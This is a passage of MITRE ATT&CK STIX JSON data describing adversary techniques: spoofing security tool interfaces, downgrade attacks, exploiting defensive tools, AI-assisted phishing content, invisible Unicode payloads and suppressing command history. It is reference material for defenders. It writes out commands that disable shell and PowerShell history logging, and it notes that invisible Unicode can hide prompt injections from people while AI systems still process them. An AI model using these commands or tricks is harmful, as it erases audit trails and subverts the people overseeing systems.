                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--0ff4bd68-aebb-4039-9e00-9f92c705edf4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:54:02.938000+00:00",
                    "modified": "2026-04-22 15:44:20.156000+00:00",
                    "name": "Modify or Spoof Tool UI",
                    "description": "Adversaries may spoof or manipulate security tool user interfaces (UIs) to falsely indicate tools are functioning normally and delay detection and response. \n\nAdversaries may present misleading or falsified security tool interfaces (UIs) that display normal or healthy status indicators, even when underlying security tools have been disabled, degraded, or otherwise tampered with. Security tools typically provide visibility into system health, alerting, and operational status; by misrepresenting this information, adversaries can undermine defender trust in these signals and obscure the true security posture of the system. \n\nThis behavior is often used in conjunction with efforts to disable or modify tools, where adversaries first impair the functionality of defenses (e.g., EDR, logging agents) and then replace or mimic their interfaces to conceal the loss of visibility. By maintaining the appearance of normal operations, such as showing active protection, successful updates, or absence of threats, adversaries can delay investigation and response, enabling continued malicious activity. \n\nFor example, adversaries may display a fake Windows Security interface or system tray icon indicating a \u201cprotected\u201d or \u201chealthy\u201d state after disabling Windows Defender or related services.(Citation: BlackBasta)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1685/003",
                            "external_id": "T1685.003"
                        },
                        {
                            "source_name": "BlackBasta",
                            "description": "Antonio Cocomazzi and Antonio Pirozzi. (2022, November 3). Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor. Retrieved March 14, 2023.",
                            "url": "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Menachem Goldstein"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--30904c16-39f9-41c6-b01a-500eb8878442",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:53:28.276000+00:00",
                    "modified": "2026-04-22 15:44:42.756000+00:00",
                    "name": "Downgrade Attack",
                    "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system\u2019s backward compatibility to force it into less secure modes of operation.\n\nAdversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL), which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to impair defenses while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike downgrade attack)(Citation: Google Cloud downgrade attack)(Citation: att_def_ps_logging)\n\nAdversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: CrowdStrike Downgrade attack 2) On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1689",
                            "external_id": "T1689"
                        },
                        {
                            "source_name": "SafeBreach",
                            "description": "Alon Leviev. (2024, August 7). Windows Downdate: Downgrade Attacks Using Windows Updates. Retrieved January 8, 2025.",
                            "url": "https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/"
                        },
                        {
                            "source_name": "CrowdStrike Downgrade attack 2",
                            "description": "Bart Lenaerts-Bergmans. (2023, March 13). What are Downgrade Attacks?. Retrieved April 15, 2026.",
                            "url": "https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/downgrade-attack/"
                        },
                        {
                            "source_name": "Targeted SSL Stripping Attacks Are Real",
                            "description": "Check Point. (n.d.). Targeted SSL Stripping Attacks Are Real. Retrieved May 24, 2023.",
                            "url": "https://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/"
                        },
                        {
                            "source_name": "CrowdStrike downgrade attack",
                            "description": "Falcon Complete Team. (2021, May 11). Response When Minutes Matter: Rising Up Against Ransomware. Retrieved April 15, 2026.",
                            "url": "https://www.crowdstrike.com/en-us/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/"
                        },
                        {
                            "source_name": "att_def_ps_logging",
                            "description": "Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021.",
                            "url": "https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/"
                        },
                        {
                            "source_name": "Google Cloud downgrade attack",
                            "description": "Nathan Kirk. (2018, June 18). Bring Your Own Land (BYOL) \u2014 A Novel Red Teaming Technique. Retrieved April 15, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/bring-your-own-land-novel-red-teaming-technique/"
                        },
                        {
                            "source_name": "Praetorian TLS Downgrade Attack 2014",
                            "description": "Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.",
                            "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Arad Inbar, Fidelis Security",
                        "Daniel Feichter, @VirtualAllocEx, Infosec Tirol",
                        "Mayuresh Dani, Qualys"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "macOS",
                        "Windows",
                        "Linux"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--01c9b54f-c04e-41ba-b0c3-cfe784b3a463",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:53:27.621000+00:00",
                    "modified": "2026-04-16 20:10:42.138000+00:00",
                    "name": "Exploitation for Defense Impairment",
                    "description": "Adversaries may exploit vulnerabilities in security software, infrastructure, or defensive components to degrade, disable, or otherwise continue to impair their ability to prevent, detect, or respond to malicious activity. \n \nAdversaries may exploit a system or application vulnerability to directly interfere with defensive mechanisms. Exploitation occurs when an adversary takes advantage of a programming error in software, services, or the operating system to execute adversary-controlled code, often with the goal of weakening or disabling protections. \n\nVulnerabilities may exist in security tools such as antivirus, endpoint detection and response (EDR), firewalls, or other monitoring solutions. Adversaries may use prior reconnaissance or perform discovery activities (e.g., [Software Discovery](https://attack.mitre.org/techniques/T1518)) to identify defensive tools present in an environment and target them for exploitation. \n\nSuccessful exploitation may allow adversaries to terminate security processes, disable protections, bypass enforcement mechanisms, or reduce the effectiveness of defensive controls. In some cases, vulnerabilities in cloud-based or SaaS infrastructure may also be leveraged to bypass built-in security boundaries or disrupt visibility and enforcement across environments.(Citation: Salesforce zero-day in facebook phishing attack)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1687",
                            "external_id": "T1687"
                        },
                        {
                            "source_name": "Salesforce zero-day in facebook phishing attack",
                            "description": "Bill Toulas. (2023, August 2). Hackers exploited Salesforce zero-day in Facebook phishing attack. Retrieved September 18, 2023.",
                            "url": "https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Linux",
                        "macOS",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b512fb8a-18dd-4bfc-bbad-acbaaeb7dde3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-03-25 14:24:06.194000+00:00",
                    "modified": "2026-04-23 23:36:34.476000+00:00",
                    "name": "Generate Content",
                    "description": "Adversaries may create or generate content to support targeting and operations. This content may be used to establish personas, impersonate known individuals or organizations, and support [Social Engineering](https://attack.mitre.org/techniques/T1684), fraud, or influence activities. Written materials, audio, images, video, or other media may be developed and tailored to the target and objective.(Citation: IBM AI-Generated Content)\n\nContent development may occur prior to or during an operation. Adversaries may develop or generate content in-house, source it through third parties, or produce it using AI-assisted tools. Adversaries may use AI to research targets, develop pretexts, and better understand the organizations and individuals they intend to target or deceive prior to generating content (i.e., [Query Public AI Services](https://attack.mitre.org/techniques/T1682)); for obtaining access to AI tools used in content generation, see [Artificial Intelligence](https://attack.mitre.org/techniques/T1588/007). \n\nContent may be leveraged in support of techniques such as [Phishing](https://attack.mitre.org/techniques/T1566), [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Social Engineering](https://attack.mitre.org/techniques/T1684), [Financial Theft](https://attack.mitre.org/techniques/T1657), or [Establish Accounts](https://attack.mitre.org/techniques/T1585). Generated or developed content does not include malicious code or scripts (i.e., [Develop Capabilities](https://attack.mitre.org/techniques/T1587) and [Artificial Intelligence](https://attack.mitre.org/techniques/T1588/007)).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "resource-development"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1683",
                            "external_id": "T1683"
                        },
                        {
                            "source_name": "IBM AI-Generated Content",
                            "description": "Tim Mucci. (n.d.). What is AI-Generated Content?. Retrieved April 22, 2026.",
                            "url": "https://www.ibm.com/think/insights/ai-generated-content"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--8f452cb4-cbf4-4522-8b11-448787be95c4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-03-25 14:28:15.331000+00:00",
                    "modified": "2026-04-20 15:34:51.855000+00:00",
                    "name": "Audio-Visual Content",
                    "description": "Adversaries may create or manipulate audio, image, and video content to support targeting and malicious operations. Adversaries may also use synthetic voice recordings, real-time altered audio or video during live interactions, fabricated profile photos and identity documents, or video content depicting fabricated or impersonated individuals.(Citation: Nov AI Threat Tracker)\n\nContent may be produced manually through editing tools, generated using AI-assisted tools, or produced using third-party synthetic services.(Citation: FBI 2025 AI Generate Content)(Citation: Europol Deepfakes) AI-assisted tools have enabled adversaries to produce synthetic media at scale and generate content that is more difficult to identify as inauthentic. \n\nAudio-visual content produced through these methods may be used in support of other techniques, such as [Phishing](https://attack.mitre.org/techniques/T1660), [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003), [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Social Engineering](https://attack.mitre.org/techniques/T1684), [Financial Theft](https://attack.mitre.org/techniques/T1657), or [Establish Accounts](https://attack.mitre.org/techniques/T1585).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "resource-development"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1683/002",
                            "external_id": "T1683.002"
                        },
                        {
                            "source_name": "Europol Deepfakes",
                            "description": "Europol. (2022). FACING REALITY? LAW ENFORCEMENT AND THE CHALLENGE OF DEEPFAKES. Retrieved April 17, 2026.",
                            "url": "https://www.europol.europa.eu/cms/sites/default/files/documents/Europol_Innovation_Lab_Facing_Reality_Law_Enforcement_And_The_Challenge_Of_Deepfakes.pdf"
                        },
                        {
                            "source_name": "Nov AI Threat Tracker",
                            "description": "Google Threat Intelligence Group. (2025, November 5). GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools. Retrieved March 31, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"
                        },
                        {
                            "source_name": "FBI 2025 AI Generate Content",
                            "description": "Internet Crime Complaint Center, FBI. (2025). Federal Bureau of Investigation Internet Crime Report, 2025. Retrieved April 17, 2026.",
                            "url": "https://www.ic3.gov/AnnualReport/Reports/2025_IC3Report.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Gilberto P\u00e9rez",
                        "Alex Wong",
                        "Patrick Mkhael (aka Pinguino)"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--6a6f9892-c46a-46db-b331-c09a99200fcf",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-03-25 14:26:19.040000+00:00",
                    "modified": "2026-04-20 15:34:25.836000+00:00",
                    "name": "Written Content",
                    "description": "Adversaries may create or tailor written materials to support targeting and malicious operations. Content may include phishing lures, fraudulent financial communications, fabricated job postings, fabricated employment credentials and documentation, decoy documents, social media persona content, and supporting narratives used to sustain fabricated personas over time.(Citation: GenAI Phishing)(Citation: GTIG AI Threat Tracker) Content may be authored manually, commissioned through third parties, or produced using AI-assisted tools.\n\nWritten materials may impersonate legitimate government correspondence, diplomatic communications, or internal organizational documents to support targeting efforts. AI-assisted tools may also be used to tailor content to specific targets, industries, or regions. For example, adversaries may leverage AI to translate content into a target's native language or mimic the communication style of trusted senders.\n\nWritten content produced through these methods may be used in support of other techniques, such as [Phishing](https://attack.mitre.org/techniques/T1660), [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003), [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Social Engineering](https://attack.mitre.org/techniques/T1684), [Financial Theft](https://attack.mitre.org/techniques/T1657), or [Establish Accounts](https://attack.mitre.org/techniques/T1585).\n\nWritten content does not include malicious code or scripts; for development of malicious code and scripts, see [Develop Capabilities](https://attack.mitre.org/techniques/T1587).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "resource-development"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1683/001",
                            "external_id": "T1683.001"
                        },
                        {
                            "source_name": "GenAI Phishing",
                            "description": "Adaptive Team. (2025, August 29). Generative AI Phishing: How to Defend in 2025. Retrieved March 26, 2026.",
                            "url": "https://www.adaptivesecurity.com/blog/ai-phishing"
                        },
                        {
                            "source_name": "GTIG AI Threat Tracker",
                            "description": "Google Threat Intelligence Group . (2026, February 12). GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use. Retrieved March 25, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e9b75bb0-b5ec-42c8-b728-f4f424d9c39e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 19:18:41.169000+00:00",
                    "modified": "2026-04-23 18:41:48.689000+00:00",
                    "name": "Invisible Unicode",
                    "description": "Adversaries may abuse invisible or non-printing Unicode characters to conceal malicious content within files, scripts, or text. By inserting characters that do not visibly render, adversaries may hide data, alter how content is interpreted, or make malicious code appear as benign text or whitespace. Adversaries may encode these malicious payloads, using binary, Base64, or custom schemes, to be reconstructed at runtime through scripting features such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) Proxy traps, `eval()`, or other dynamic execution methods. This technique enables adversaries to evade visual inspection and basic static analysis by hiding malicious encoded content in innocuous text.(Citation: PUAs Unicode - Eriksen)(Citation: Tycoon2FA - Unicode)(Citation: Unicode - Veracode) \n\nUnicode is a standardized character encoding model that assigns a unique numerical value, known as a code point, to every character across writing systems, enabling consistent text representation across platforms, applications, and languages. Code points are represented as `U+` followed by a hexadecimal value and may be encoded using formats such as `UTF-8` or `UTF-16`. Adversaries may abuse the valid code points in Unicode that are not visibly rendered but still take up bytes, such as zero-width spaces, variation selectors, or bidirectional formatting controls, to conceal malicious payloads.(Citation: Tycoon2FA - Unicode)(Citation: GlassWorm - Unicode)(Citation: Unicode and Hidden Prompts - Perets)\n\nAdversaries may additionally exploit Private Use Area (PUA) characters, a range of code points reserved for custom assignment. PUA characters that are not defined by a font or application are typically rendered blank.(Citation: PUAs Unicode - Eriksen)\n\nUnicode characters may also be leveraged in support of other techniques such as [Phishing](https://attack.mitre.org/techniques/T1660), [Right-to-Left Override](https://attack.mitre.org/techniques/T1036/002), or [User Execution](https://attack.mitre.org/techniques/T1204). For example, some adversaries may embed artificial intelligence (AI) prompt injections using invisible Unicode characters in emails or documents that appear benign when processed by AI systems.(Citation: LLMs and Unicode - Medium)(Citation: Invisible Prompt Injection - Trend Micro)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/018",
                            "external_id": "T1027.018"
                        },
                        {
                            "source_name": "GlassWorm - Unicode",
                            "description": " Idan Dardikman. (2025, October 18). GlassWorm: First Self-Propagating Worm Using Invisible Code Hits OpenVSX Marketplace. Retrieved April 21, 2026.",
                            "url": "https://www.koi.ai/blog/glassworm-first-self-propagating-worm-using-invisible-code-hits-openvsx-marketplace#heading-5"
                        },
                        {
                            "source_name": "PUAs Unicode - Eriksen",
                            "description": "Charlie Eriksen. (2025, May 13). You're Invited: Delivering malware via Google Calendar invites and PUAs. Retrieved April 21, 2026.",
                            "url": "https://www.aikido.dev/blog/youre-invited-delivering-malware-via-google-calendar-invites-and-puas"
                        },
                        {
                            "source_name": "Invisible Prompt Injection - Trend Micro",
                            "description": "Ian Ch Lui. (2025, January 22). Invisible Prompt Injection: A Threat to AI Security. Retrieved April 21, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/25/a/invisible-prompt-injection-secure-ai.html"
                        },
                        {
                            "source_name": "LLMs and Unicode - Medium",
                            "description": "Idan Habler. (2025, September 12). Hiding in Plain Sight: Weaponizing Invisible Unicode to Attack LLMs. Retrieved April 21, 2026.",
                            "url": "https://idanhabler.medium.com/hiding-in-plain-sight-weaponizing-invisible-unicode-to-attack-llms-f9033865ec10"
                        },
                        {
                            "source_name": "Tycoon2FA - Unicode",
                            "description": "Rodel Mendrez. (2025, April 10). Tycoon2FA New Evasion Technique for 2025. Retrieved April 21, 2026.",
                            "url": "https://www.levelblue.com/blogs/spiderlabs-blog/tycoon2fa-new-evasion-technique-for-2025"
                        },
                        {
                            "source_name": "Unicode and Hidden Prompts - Perets",
                            "description": "Shaked Perets. (2025, December 7). Invisible Code & Hidden Prompts \u2013 How Attackers Weaponize Unicode in Repos (and How SAST Can Help). Retrieved April 21, 2026.",
                            "url": "https://cycode.com/blog/invisible-code-hidden-prompts-unicode-attacks-sast/"
                        },
                        {
                            "source_name": "Unicode - Veracode",
                            "description": "Veracode Threat Research. (2025, June 9). Down the Rabbit Hole of Unicode Obfuscation. Retrieved April 21, 2026.",
                            "url": "https://www.veracode.com/blog/down-the-rabbit-hole-of-unicode-obfuscation/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Menachem Goldstein",
                        "Rich Rafferty (NR Labs)"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b831f51c-d22f-4724-bbab-60d056bd1150",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:53:28.653000+00:00",
                    "modified": "2026-04-22 15:45:06.768000+00:00",
                    "name": "Prevent Command History Logging",
                    "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they have done.\n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable `HISTFILE`. When a user logs off a system, this information is flushed to a file in the user's home directory called `~/.bash_history`. The `HISTCONTROL` environment variable keeps track of what should be saved by the history command and eventually into the `~/.bash_history` file when a user logs out. `HISTCONTROL` does not exist by default on macOS, but can be set by the user and will be respected. The `HISTFILE` environment variable is also used in some ESXi systems.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)\n\nAdversaries may clear the history environment variable (`unset HISTFILE`) or set the command history size to zero (`export HISTFILESIZE=0`) to prevent logging of commands. Additionally, `HISTCONTROL` can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". `HISTCONTROL` can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \" ls\" will not be saved, but \"ls\" would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.\n\nOn Windows systems, the `PSReadLine` module tracks commands used in all PowerShell sessions and writes them to a file (`$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt` by default). Adversaries may change where these logs are saved using `Set-PSReadLineOption -HistorySavePath {File Path}`. This will cause `ConsoleHost_history.txt` to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command `Set-PSReadlineOption -HistorySaveStyle SaveNothing`.(Citation: Microsoft about_History prevent command history)(Citation: Sophos PowerShell Command History Forensics)\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. `no logging`).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1690",
                            "external_id": "T1690"
                        },
                        {
                            "source_name": "Google Cloud Threat Intelligence ESXi VIBs 2022",
                            "description": "Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore. (2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence"
                        },
                        {
                            "source_name": "Microsoft about_History prevent command history",
                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                            "url": "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7.6&viewFallbackFrom=powershell-7"
                        },
                        {
                            "source_name": "Sophos PowerShell Command History Forensics",
                            "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024.",
                            "url": "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Austin Clark, @c2defense",
                        "Emile Kenning, Sophos",
                        "Vikas Singh, Sophos"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--143122a8-fcda-4dd7-aded-5b9387d9c2d6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-03-25 14:21:30.680000+00:00",
                    "modified": "2026-04-20 20:59:00.096000+00:00",
                    "name": "Query Public AI Services",
                    "description": "Adversaries may query publicly accessible artificial intelligence (AI) services, such as large language models (LLMs), to support targeting and operations. In addition to searching websites or databases directly (i.e., [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), adversaries may use AI services to synthesize, aggregate, and analyze publicly available information at scale. This may include identifying individuals or organizations to target, researching organizational structures and personnel, identifying technologies used by target organizations, researching business relationships to develop plausible pretexts for [Social Engineering](https://attack.mitre.org/techniques/T1684) approaches, identifying contact information for use in [Phishing](https://attack.mitre.org/techniques/T1566) or [Phishing for Information](https://attack.mitre.org/techniques/T1598), or gathering derogatory or sensitive information about individuals that may be used for extortion or coercion.(Citation: MSFT-AI)(Citation: GTIG AI Threat Tracker)\n\nInformation gathered through AI services may be leveraged for other behaviors, such as establishing operational resources (i.e., [Generate Content](https://attack.mitre.org/techniques/T1683) or [Establish Accounts](https://attack.mitre.org/techniques/T1585). For obtaining access to AI tools and services, see [Artificial Intelligence](https://attack.mitre.org/techniques/T1588/007).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "reconnaissance"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1682",
                            "external_id": "T1682"
                        },
                        {
                            "source_name": "GTIG AI Threat Tracker",
                            "description": "Google Threat Intelligence Group . (2026, February 12). GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use. Retrieved March 25, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use"
                        },
                        {
                            "source_name": "MSFT-AI",
                            "description": "Microsoft Threat Intelligence. (2024, February 14). Staying ahead of threat actors in the age of AI. Retrieved March 11, 2024.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
